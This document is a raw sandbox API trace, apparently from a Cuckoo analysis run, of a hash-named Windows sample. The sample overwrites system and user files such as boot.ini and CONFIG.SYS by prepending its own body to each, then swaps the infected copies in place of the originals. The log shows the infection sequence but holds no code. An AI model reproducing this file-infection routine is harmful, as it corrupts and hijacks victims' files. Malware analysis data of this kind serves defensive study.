"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000114","lpFileName->C:\boot.ini","dwDesiredAccess->GENERIC_READ"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->268"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000114","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000000e4","lpFileName->C:\boot.ini","dwDesiredAccess->GENERIC_READ"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000118","lpFileName->C:\boot.ini.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000134","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000134","lpValueName->NoSimpleStartMenu"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000134","hKey->0x00000128","lpSubKey->Advanced"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->Hidden"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->ShowCompColor"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->HideFileExt"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->DontPrettyPath"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->ShowInfoTip"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->HideIcons"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->MapNetDrvBtn"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->WebView"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->Filter"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->ShowSuperHidden"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->SeparateProcess"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->NoNetCrawling"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x00000122","lpSubKey->ShellEx\IconHandler"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000122","lpValueName->DocObject"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000122","lpValueName->BrowseInPlace"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x00000122","lpSubKey->Clsid"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000013a","hKey->HKEY_CLASSES_ROOT","lpSubKey->Folder"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000013a","lpSubKey->Clsid"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000122","lpValueName->IsShortcut"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000122","lpValueName->AlwaysShowExt"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000122","lpValueName->NeverShowExt"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->47554"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->47554"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->211"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->211"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->268"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->268"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000138","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000138","lpValueName->UseDesktopIniCache"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\boot.ini"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\boot.ini.exe","lpNewFileName->C:\boot.ini"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000138","lpFileName->C:\CONFIG.SYS","dwDesiredAccess->GENERIC_READ"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->268"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000138","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->C:\CONFIG.SYS","dwDesiredAccess->GENERIC_READ"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000118","lpFileName->C:\CONFIG.SYS.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->420","szExeFile->8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->47554"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->47554"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->268"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->268"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x77120000","lpFileName->oleaut32.dll"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000118","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000118","lpValueName->Com+Enabled"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\CONFIG.SYS"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\CONFIG.SYS.exe","lpNewFileName->C:\CONFIG.SYS"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000138","lpFileName->C:\cuckoo\additional\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->268"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3\Debug"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3\Debug"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\OLE"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->MinimumFreeMemPercentageToCreateProcess"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->MinimumFreeMemPercentageToCreateObject"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000000e4","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000011c","lpFileName->C:\cuckoo\additional\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000013c","lpFileName->C:\cuckoo\additional\.gitignore.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x76fd0000","lpFileName->CLBCATQ.DLL"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000144","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000144","lpValueName->Com+Enabled"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x76fd0000","lpFileName->CLBCATQ.DLL"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000144","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000150","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000160","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000170","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000178","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000180","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes\CLSID"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000188","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
